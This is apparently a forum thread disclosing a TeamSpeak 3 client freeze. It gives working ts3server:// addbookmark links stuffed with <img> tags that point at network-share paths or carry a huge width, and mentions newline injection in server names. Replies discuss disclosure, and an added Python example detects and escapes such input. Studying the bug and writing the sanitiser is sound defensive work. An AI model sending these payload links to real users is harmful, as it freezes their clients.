TeamSpeak 3 addbookmark client freeze

Asphyxia

Owner
Administrator
Joined
Apr 25, 2015
Messages
1,846
Solutions
2
Reaction score
2,201
Points
327
Code:
[url=ts3server://localhost?addbookmark=<img%20source=//a/a><img%20source=//b/b><img%20source=//c/c><img%20source=//d/d><img%20source=//e/e><img%20source=//f/f><img%20source=//z/z><img%20source=//w/w><img%20source=//zz/zz><img%20source=//ad/ad><img%20source=//ffa/ffa><img%20source=//a3/33a><img%20source=//aa43/fa33a><img%20source=//awfea/2343aa><img%20source=//awfe22a/232243aa><img%20source=//awf90ea/234903aa><img%20source=//awz4fea/23443fgaa><img%20source=//ab54wfea/2343z45aa><img%20source=//azas46wfea/234365aaa><img%20source=//awff35ea/2343aawa23a><img%20source=//awfa344ea/245343aa>&nickname=UserNickname]https://www.youtube.com/watch?v=ZbZSe6N_BXs[/url]

This could possibly cause Windows clients to freeze up (thinking related to network shares).

Also, apparently if you get a wide enough image that'll do rather well:
Code:
[url=ts3server://localhost?addbookmark=<img%20width=2000000%20source=//a/a>&nickname=UserNickname]https://www.youtube.com/watch?v=ZbZSe6N_BXs[/url]

...

Lastly, I found that editing the SQLite DB to contain a server nickname with a bunch of messed-up <img> sourcing (src=) top-like... will cause freezing on connect to a server. This does require user interaction, of course, but it is a good example of how TeamSpeak still has some work to do to make their software safer and freer from bugs.

Even more, channel and server names permit editing in newline characters, which distort the list showing server/channel name(s).
 

BennetGallein
Is this reported to TeamSpeak already? It is against ethical standards to just publish such an important vulnerability without giving the company time to respond.
 

Zalati
It was very fun to help find this. Best night in a long time :)
 

Asphyxia
Another Qt bug. Teamspeak needs to just drop Qt.
That's partially true; it is the Qt developers' job to responsibly handle inputs. For example, where Qt renders HTML, maybe strip all HTML characters, e.g. "<" and ">", along with the URL-encoded equivalents, just for double measure.

Validate, sanitize, and just make all input and output clean. When developers overlook the in and out, they get lions mixed up with sheep.
 
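The following is an added example, not TeamSpeak's or Qt's code, showing the input handling the first post's payloads and the "validate, sanitize" reply above are asking for. It parses a ts3server:// URL the way a hardened client might, flags the properties the thread abuses in the addbookmark parameter (HTML tags, many <img> elements, //host/share or \\host\share sources, absurd width/height values, and the newline characters mentioned for channel/server names) and HTML-escapes the value before it would ever reach a rich-text widget. The parameter list, the MAX_IMAGES and MAX_DIMENSION limits and the sample URLs are assumptions constructed for this example; the posted payloads use source= rather than the real src= attribute, so the check matches both.

```python
"""Added example (not TeamSpeak or Qt code): parse a ts3server:// URL and refuse
or neutralise rich-text markup in free-text parameters before display."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical limits and parameter list for this example; the real client's
# limits are not on the page.
MAX_IMAGES = 4
MAX_DIMENSION = 4096
TEXT_PARAMS = ("addbookmark", "nickname")

TAG_RE = re.compile(r"<\s*/?\s*[a-z][^>]*>", re.I)
IMG_RE = re.compile(r"<\s*img\b", re.I)
# The posted payloads use source=//host/share; a real <img> uses src=. Match both,
# plus backslash UNC paths, since either may be resolved as a network share on Windows.
NET_SOURCE_RE = re.compile(r"\b(?:src|source)\s*=\s*[\"']?(?://|\\\\)", re.I)
DIMENSION_RE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?(\d+)", re.I)
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")


def parse_ts3server_url(url: str) -> dict:
    """Split a ts3server:// URL into host, port and percent-decoded query parameters."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "ts3server":
        raise ValueError("not a ts3server:// URL")
    # parse_qs percent-decodes, so %20 becomes a space and the markup becomes visible.
    query = parse_qs(parts.query, keep_blank_values=True)
    return {
        "host": parts.hostname,
        "port": parts.port,
        "params": {name: values[0] for name, values in query.items()},
    }


def classify(value: str) -> list:
    """Return the reasons a free-text parameter is unsafe to hand to a rich-text widget."""
    findings = []
    if TAG_RE.search(value):
        findings.append("html_tag")
    if len(IMG_RE.findall(value)) > MAX_IMAGES:
        findings.append("too_many_images")
    if NET_SOURCE_RE.search(value):
        findings.append("network_source")
    if any(int(n) > MAX_DIMENSION for n in DIMENSION_RE.findall(value)):
        findings.append("oversized_dimension")
    if CONTROL_RE.search(value):
        findings.append("control_chars")
    return findings


def sanitize(value: str) -> str:
    """Neutralise markup and line breaks: replace control characters with a space,
    then escape <, >, &, and quotes so the string renders as literal text."""
    return html.escape(CONTROL_RE.sub(" ", value))


def safe_bookmark(url: str) -> dict:
    """Parse the URL, record what was wrong with each text parameter, and return escaped values."""
    parsed = parse_ts3server_url(url)
    report = {"host": parsed["host"], "port": parsed["port"], "params": {}, "findings": {}}
    for name in TEXT_PARAMS:
        raw = parsed["params"].get(name, "")
        report["findings"][name] = classify(raw)
        report["params"][name] = sanitize(raw)
    return report


# Constructed samples mirroring the payload shapes discussed in the thread.
WIDE_IMAGE = "ts3server://localhost?addbookmark=<img%20width=2000000%20source=//a/a>&nickname=UserNickname"
MANY_IMAGES = ("ts3server://localhost?addbookmark="
               + "".join(f"<img%20source=//s{i}/s{i}>" for i in range(21))
               + "&nickname=UserNickname")
NEWLINE_NAME = "ts3server://localhost?addbookmark=Lobby%0AFake%20line&nickname=UserNickname"
BENIGN = "ts3server://localhost?addbookmark=My%20Server&nickname=UserNickname"

if __name__ == "__main__":
    for url in (WIDE_IMAGE, MANY_IMAGES, NEWLINE_NAME, BENIGN):
        result = safe_bookmark(url)
        print(result["findings"]["addbookmark"], "->", result["params"]["addbookmark"][:60])
```

The escaping step is the same thing Qt's QString::toHtmlEscaped() does; the findings list is there so a client can reject or log the bookmark rather than silently render it. Pinning the widget that shows bookmark and server names to Qt::PlainText removes the rendering path entirely, which is the simpler fix where rich text is not actually needed.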

Asphyxia
Apparently they are going to fix this, hooray!
 